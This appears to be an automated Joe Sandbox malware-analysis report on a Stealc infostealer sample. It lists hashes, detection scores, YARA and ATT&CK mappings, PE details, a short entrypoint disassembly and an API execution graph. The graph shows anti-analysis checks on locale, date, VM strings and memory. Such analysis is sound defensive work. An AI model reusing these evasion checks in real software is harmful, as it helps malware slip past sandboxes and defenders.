Edit tour

Windows Analysis Report
stealc.bin.exe

Overview

General Information

Sample Name:stealc.bin.exe
Analysis ID:812492
MD5:0d049f764a22e16933f8c3f1704d4e50
SHA1:5faad57c7341f76c18ae813e9fa9fbfe434f7b41
SHA256:77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d
Tags:exeStealc
Infos:

Detection

Stealc
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Stealc
Found evasive API chain (may stop execution after checking locale)
PE file has a writeable .text section
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • stealc.bin.exe (PID: 5836 cmdline: C:\Users\user\Desktop\stealc.bin.exe MD5: 0D049F764A22E16933F8C3F1704D4E50)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
stealc.bin.exeJoeSecurity_StealcYara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        Process Memory Space: stealc.bin.exe PID: 5836JoeSecurity_StealcYara detected StealcJoe Security
          SourceRuleDescriptionAuthorStrings
          2.2.stealc.bin.exe.170000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
            2.0.stealc.bin.exe.170000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: stealc.bin.exeAvira: detected
              Source: stealc.bin.exeReversingLabs: Detection: 61%
              Source: stealc.bin.exeVirustotal: Detection: 74%Perma Link
              Source: stealc.bin.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_00174C21 CryptStringToBinaryA,CryptStringToBinaryA,2_2_00174C21
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_001767F3 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,2_2_001767F3
              Source: stealc.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: stealc.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: stealc.bin.exe, 00000002.00000002.284195778.0000000000AFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Source: stealc.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: stealc.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: String function: 00173083 appears 326 times
              Source: stealc.bin.exeReversingLabs: Detection: 61%
              Source: stealc.bin.exeVirustotal: Detection: 74%
              Source: stealc.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: C:\Users\user\Desktop\stealc.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: classification engineClassification label: mal76.troj.evad.winEXE@1/0@0/0
              Source: stealc.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_0017DD84 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0017DD84
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_0017DD84 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0017DD84

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\stealc.bin.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-6995
              Source: C:\Users\user\Desktop\stealc.bin.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_2-8734
              Source: C:\Users\user\Desktop\stealc.bin.exeAPI coverage: 7.9 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_001792E7 GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetSystemInfo,GetProcessHeap,RtlAllocateHeap,GlobalMemoryStatusEx,GetProcessHeap,RtlAllocateHeap,lstrlen,2_2_001792E7
              Source: C:\Users\user\Desktop\stealc.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-7953
              Source: C:\Users\user\Desktop\stealc.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-6987
              Source: C:\Users\user\Desktop\stealc.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-6994
              Source: C:\Users\user\Desktop\stealc.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-6981
              Source: C:\Users\user\Desktop\stealc.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-6996
              Source: C:\Users\user\Desktop\stealc.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-7005
              Source: stealc.bin.exe, 00000002.00000002.284217048.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_0017DD84 mov eax, dword ptr fs:[00000030h]2_2_0017DD84
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_0017DD84 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0017DD84
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_0017D193 GetProcessHeap,RtlAllocateHeap,GetUserNameA,2_2_0017D193
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_0017CECA GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,2_2_0017CECA
              Source: C:\Users\user\Desktop\stealc.bin.exeCode function: 2_2_0017D193 GetProcessHeap,RtlAllocateHeap,GetUserNameA,2_2_0017D193

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: stealc.bin.exe, type: SAMPLE
              Source: Yara matchFile source: 2.2.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: stealc.bin.exe PID: 5836, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: stealc.bin.exe, type: SAMPLE
              Source: Yara matchFile source: 2.2.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: stealc.bin.exe PID: 5836, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts12
              Native API
              Path InterceptionPath Interception1
              Virtualization/Sandbox Evasion
              1
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Input Capture
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              LSASS Memory11
              Security Software Discovery
              Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager1
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
              Account Discovery
              Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 812492 Sample: stealc.bin.exe Startdate: 21/02/2023 Architecture: WINDOWS Score: 76 8 Antivirus / Scanner detection for submitted sample 2->8 10 Multi AV Scanner detection for submitted file 2->10 12 Yara detected Stealc 2->12 14 2 other signatures 2->14 5 stealc.bin.exe 2->5         started        process3 signatures4 16 Found evasive API chain (may stop execution after checking locale) 5->16

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              stealc.bin.exe62%ReversingLabsWin32.Ransomware.Locky
              stealc.bin.exe75%VirustotalBrowse
              stealc.bin.exe100%AviraTR/Crypt.XPACK.Gen
              stealc.bin.exe100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              2.0.stealc.bin.exe.170000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.2.stealc.bin.exe.170000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              No contacted IP infos
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:812492
              Start date and time:2023-02-21 11:29:07 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 4m 29s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:11
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:stealc.bin.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@1/0@0/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 100% (good quality ratio 79.1%)
              • Quality average: 57.3%
              • Quality standard deviation: 37%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 10
              • Number of non-executed functions: 22
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              No simulations
              No context
              No context
              No context
              No context
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.164204671416999
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:stealc.bin.exe
              File size:81408
              MD5:0d049f764a22e16933f8c3f1704d4e50
              SHA1:5faad57c7341f76c18ae813e9fa9fbfe434f7b41
              SHA256:77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d
              SHA512:a6e2f5e873c76e31cbd4bd1d1e47f59ff93b2c7b9a0be804bccd5fce700377b2ed94cac6f275d6c2efa38b74875e50a11bbe9c9eeca3de09d6d4b7c06c2bc884
              SSDEEP:1536:yYsVdxtfVnAo5lg/qrZ7B2QVu0BZFQLtqhG6ha4kUYXKl2WK:yYsPPAo5lg/A/2dYZFQLUG6hTy
              TLSH:B583E729E672A2F7C851C5BC31095AD6A23A4975305EE483FFA45F82BDF00825DC8F97
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x&..<G..<G..<G..S1Y.>G..5?D.?G..5?T.>G...>..?G..<G..;G..S1h.1G..S1Z.=G..Rich<G..........................PE..L....A.c...........
              Icon Hash:00828e8e8686b000
              Entrypoint:0x40cf89
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x63D541B8 [Sat Jan 28 15:39:36 2023 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:3ea275f08a220b994925af0527312bae
              Instruction
              push ebp
              mov ebp, esp
              sub esp, 48h
              push ebx
              push esi
              push edi
              je 00007F36C905FF85h
              jne 00007F36C905FF83h
              mov eax, FF4973E8h
              push dword ptr [ebx+eax+75h]
              add dword ptr [eax+000DDEE8h], edi
              add byte ptr [eax-27h], ch
              sti
              inc eax
              add byte ptr [ebp-22170B8Bh], cl
              sbb dword ptr [eax], eax
              add byte ptr [ebx+eax+75h], dh
              add dword ptr [eax-00BFAC18h], edi
              push dword ptr [ebx+eax+75h]
              add dword ptr [eax-00BF0518h], edi
              push dword ptr [ebx+eax+75h]
              add dword ptr [eax-00BED318h], edi
              push dword ptr [ebx+eax+75h]
              add dword ptr [eax-00020A18h], edi
              push dword ptr [ebx+eax+75h]
              add dword ptr [eax-00BF5318h], edi
              jmp far eax
              test eax, 50000001h
              mov esi, 00411EC0h
              push esi
              call 00007F36C9060154h
              push eax
              push esi
              push dword ptr [00613454h]
              lea esi, dword ptr [ebp-48h]
              lea eax, dword ptr [ebp-0Ch]
              call 00007F36C9061A27h
              lea esi, dword ptr [ebp-3Ch]
              call 00007F36C9061A1Fh
              lea esi, dword ptr [ebp-30h]
              call 00007F36C9061A17h
              lea esi, dword ptr [ebp-24h]
              call 00007F36C9061A0Fh
              lea esi, dword ptr [ebp-18h]
              call 00007F36C9061A07h
              lea esi, dword ptr [ebp-0Ch]
              call 00007F36C9061983h
              mov eax, dword ptr [ebp-18h]
              call 00007F36C9054785h
              mov eax, dword ptr [ebp-24h]
              call 00007F36C905477Dh
              mov eax, dword ptr [ebp-30h]
              call 00007F36C9054775h
              mov eax, dword ptr [ebp-3Ch]
              call 00007F36C905476Dh
              Programming Language:
              • [ASM] VS2010 build 30319
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x1203c0x28.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2250000x1430.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000xdc220xde00False0.47379997184684686data6.102096193160668IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0xf0000x30ca0x3200False0.413515625data5.568635274136313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x130000x2111c70x0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .reloc0x2250000x29b80x2a00False0.41052827380952384data4.205852868774967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              DLLImport
              msvcrt.dllatexit, memset, strtok_s, memcpy, malloc, memcmp
              Report size exceeds maximum size, please checkout the PCAP download to see all network behavior
              050100s020406080100

              Click to jump to process

              050100sMB

              Click to jump to process

              Target ID:2
              Start time:11:29:57
              Start date:21/02/2023
              Path:C:\Users\user\Desktop\stealc.bin.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\stealc.bin.exe
              Imagebase:0x170000
              File size:81408 bytes
              MD5 hash:0D049F764A22E16933F8C3F1704D4E50
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
              Reputation:low

              Execution Graph

              Execution Coverage

              Dynamic/Packed Code Coverage

              Signature Coverage

              Execution Coverage:5.4%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:17.5%
              Total number of Nodes:2000
              Total number of Limit Nodes:13
              Show Legend
              Hide Nodes/Edges
              execution_graph 6832 17cf89 6833 17cf94 6832->6833 6876 17190f 6833->6876 6851 17cfea 7007 17d1c5 GetProcessHeap RtlAllocateHeap GetComputerNameA 6851->7007 6856 17eaab 3 API calls 6857 17d011 6856->6857 6858 17eaab 3 API calls 6857->6858 6859 17d019 6858->6859 6860 17eaab 3 API calls 6859->6860 6861 17d021 6860->6861 6862 17eaab 3 API calls 6861->6862 6863 17d029 6862->6863 7013 17ea2f 6863->7013 6865 17d031 6866 17d077 OpenEventA 6865->6866 6867 17d065 CloseHandle Sleep 6866->6867 6868 17d084 CreateEventA 6866->6868 6867->6866 6869 17d092 6868->6869 7017 17ceca GetSystemTime 6869->7017 6872 17d09d 7025 17c73d 6872->7025 7159 173083 6876->7159 6879 173083 3 API calls 6880 171934 6879->6880 6881 173083 3 API calls 6880->6881 6882 171945 6881->6882 6883 173083 3 API calls 6882->6883 6884 171956 6883->6884 6885 173083 3 API calls 6884->6885 6886 171967 6885->6886 6887 173083 3 API calls 6886->6887 6888 171978 6887->6888 6889 173083 3 API calls 6888->6889 6890 171989 6889->6890 6891 173083 3 API calls 6890->6891 6892 17199a 6891->6892 6893 173083 3 API calls 6892->6893 6894 1719ab 6893->6894 6895 173083 3 API calls 6894->6895 6896 1719bc 6895->6896 6897 173083 3 API calls 6896->6897 6898 1719cd 6897->6898 6899 173083 3 API calls 6898->6899 6900 1719de 6899->6900 6901 173083 3 API calls 6900->6901 6902 1719ef 6901->6902 6903 173083 3 API calls 6902->6903 6904 171a00 6903->6904 6905 173083 3 API calls 6904->6905 6906 171a11 6905->6906 6907 173083 3 API calls 6906->6907 6908 171a22 6907->6908 6909 173083 3 API calls 6908->6909 6910 171a33 6909->6910 6911 173083 3 API calls 6910->6911 6912 171a44 6911->6912 6913 173083 3 API calls 6912->6913 6914 171a55 6913->6914 6915 173083 3 API calls 6914->6915 6916 171a66 6915->6916 6917 173083 3 API calls 6916->6917 6918 171a77 6917->6918 6919 173083 3 API calls 6918->6919 6920 171a88 6919->6920 6921 173083 3 API calls 6920->6921 6922 171a99 6921->6922 6923 173083 3 API calls 6922->6923 6924 171aaa 6923->6924 6925 173083 3 API calls 6924->6925 6926 171abb 6925->6926 6927 173083 3 API calls 6926->6927 6928 171acc 6927->6928 6929 173083 3 API calls 6928->6929 6930 171add 6929->6930 6931 173083 3 API calls 6930->6931 6932 171aee 6931->6932 6933 173083 3 API calls 6932->6933 6934 171aff 6933->6934 6935 173083 3 API calls 6934->6935 6936 171b10 6935->6936 6937 173083 3 API calls 6936->6937 6938 171b21 6937->6938 6939 173083 3 API calls 6938->6939 6940 171b32 6939->6940 6941 173083 3 API calls 6940->6941 6942 171b43 6941->6942 6943 173083 3 API calls 6942->6943 6944 171b54 6943->6944 6945 173083 3 API calls 6944->6945 6946 171b65 6945->6946 6947 173083 3 API calls 6946->6947 6948 171b76 6947->6948 6949 173083 3 API calls 6948->6949 6950 171b87 6949->6950 6951 173083 3 API calls 6950->6951 6952 171b98 6951->6952 6953 173083 3 API calls 6952->6953 6954 171ba9 6953->6954 6955 173083 3 API calls 6954->6955 6956 171bba 6955->6956 6957 173083 3 API calls 6956->6957 6958 171bcb 6957->6958 6959 173083 3 API calls 6958->6959 6960 171bdc 6959->6960 6961 17dd84 GetPEB 6960->6961 6962 17df98 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 6961->6962 6967 17ddb4 6961->6967 6963 17dff7 GetProcAddress 6962->6963 6964 17e009 6962->6964 6963->6964 6965 17e012 GetProcAddress GetProcAddress 6964->6965 6966 17e03b 6964->6966 6965->6966 6968 17e056 6966->6968 6969 17e044 GetProcAddress 6966->6969 6972 17ddc7 20 API calls 6967->6972 6970 17e071 6968->6970 6971 17e05f GetProcAddress 6968->6971 6969->6968 6973 17cfa5 6970->6973 6974 17e07a GetProcAddress 6970->6974 6971->6970 6972->6962 6975 17e990 6973->6975 6974->6973 6977 17e99b 6975->6977 6976 17cfb0 6979 171010 GetCurrentProcess VirtualAllocExNuma 6976->6979 6977->6976 6978 17e9b2 lstrcpy 6977->6978 6978->6976 6980 171040 VirtualAlloc 6979->6980 6981 171039 ExitProcess 6979->6981 6982 171059 6980->6982 6983 171067 VirtualFree 6982->6983 6984 17108c 6982->6984 6983->6984 6985 1710c1 6984->6985 6986 1710d5 6985->6986 6987 1710f2 ExitProcess 6986->6987 6988 1710f9 6986->6988 6989 1710fd 6988->6989 6990 17110b GlobalMemoryStatusEx 6989->6990 6993 17112b 6990->6993 6992 171156 6995 17cdd0 GetUserDefaultLangID 6992->6995 6993->6992 6994 17114e ExitProcess 6993->6994 6996 17cdf2 ExitProcess 6995->6996 6997 17cde0 6995->6997 6997->6996 6998 17cdfa 6997->6998 6999 171091 6998->6999 7000 17d1c5 3 API calls 6999->7000 7001 171096 7000->7001 7002 1710c0 7001->7002 7172 17d193 GetProcessHeap RtlAllocateHeap GetUserNameA 7001->7172 7006 17d193 GetProcessHeap RtlAllocateHeap GetUserNameA 7002->7006 7004 1710aa 7004->7002 7005 1710b9 ExitProcess 7004->7005 7006->6851 7008 17cff6 7007->7008 7009 17eaab lstrlen 7008->7009 7011 17ead2 7009->7011 7010 17d009 7010->6856 7011->7010 7012 17eae5 lstrcpy lstrcat 7011->7012 7012->7010 7014 17ea3e 7013->7014 7015 17ea65 7014->7015 7016 17ea5d lstrcpy 7014->7016 7015->6865 7016->7015 7173 17cdfb 7017->7173 7019 17cf1d sscanf 7200 171839 7019->7200 7021 17cf46 SystemTimeToFileTime SystemTimeToFileTime 7022 17cf84 7021->7022 7023 17cf70 7021->7023 7022->6872 7023->7022 7024 17cf7c ExitProcess 7023->7024 7026 17c74a 7025->7026 7027 17e990 lstrcpy 7026->7027 7028 17c75e 7027->7028 7202 17e9eb lstrlen 7028->7202 7031 17e9eb 2 API calls 7032 17c796 7031->7032 7033 17e9eb 2 API calls 7032->7033 7034 17c79f 7033->7034 7035 17e9eb 2 API calls 7034->7035 7036 17c7a8 7035->7036 7206 171be3 7036->7206 7041 17e9eb 2 API calls 7042 17c895 7041->7042 7043 17eaab 3 API calls 7042->7043 7044 17c8a6 7043->7044 7045 17ea2f lstrcpy 7044->7045 7046 17c8ae 7045->7046 7047 17e990 lstrcpy 7046->7047 7048 17c8c4 7047->7048 7049 17eaab 3 API calls 7048->7049 7050 17c8d5 7049->7050 7051 17ea2f lstrcpy 7050->7051 7052 17c8dd 7051->7052 7053 17eaab 3 API calls 7052->7053 7054 17c8f9 7053->7054 7055 17ea2f lstrcpy 7054->7055 7056 17c901 7055->7056 7057 17e990 lstrcpy 7056->7057 7058 17c921 7057->7058 7812 17d0be 7058->7812 7064 17c93e 7950 17916b 7064->7950 7066 17c949 7067 17e990 lstrcpy 7066->7067 7068 17c969 7067->7068 7958 1716cb 7068->7958 7072 17c97c 8087 178cd3 strtok_s 7072->8087 7074 17c987 7075 17e990 lstrcpy 7074->7075 7076 17c99b 7075->7076 7077 1716cb lstrcpy 7076->7077 7078 17c9a5 7077->7078 7079 173d9b 27 API calls 7078->7079 7080 17c9ae 7079->7080 8093 178bcb strtok_s 7080->8093 7082 17c9bf 7083 1716cb lstrcpy 7082->7083 7084 17c9cc 7083->7084 8098 1792e7 7084->8098 7086 17c9d1 7087 17e990 lstrcpy 7086->7087 7088 17c9de 7087->7088 8430 1736bc GetProcessHeap RtlAllocateHeap 7088->8430 7090 17c9e3 7091 1716cb lstrcpy 7090->7091 7092 17c9f9 7091->7092 8432 1789c2 7092->8432 7094 17ca0c 7095 17e990 lstrcpy 7094->7095 7096 17ca22 7095->7096 7097 1716cb lstrcpy 7096->7097 7098 17ca2c 7097->7098 7099 173d9b 27 API calls 7098->7099 7100 17ca35 7099->7100 8453 178d6c strtok_s 7100->8453 7102 17ca46 7103 1716cb lstrcpy 7102->7103 7118 17ca57 7103->7118 7104 17cabe 7106 17e990 lstrcpy 7104->7106 7105 1716cb lstrcpy 7105->7118 7107 17cae6 7106->7107 7109 1716cb lstrcpy 7107->7109 7108 17e9c2 lstrcpy 7108->7118 7110 17caf3 7109->7110 7111 173d9b 27 API calls 7110->7111 7112 17cafc 7111->7112 8502 178e1f strtok_s 7112->8502 7114 17cb07 7116 1716cb lstrcpy 7114->7116 7117 17cb1c 7116->7117 8540 17aae7 7117->8540 7118->7104 7118->7105 7118->7108 8458 17115a 7118->8458 7120 17cb27 7121 1716cb lstrcpy 7120->7121 7130 17cb40 7120->7130 7123 17cb3b 7121->7123 7122 1716cb lstrcpy 7125 17cb55 7122->7125 8546 17ad4c memset 7123->8546 8573 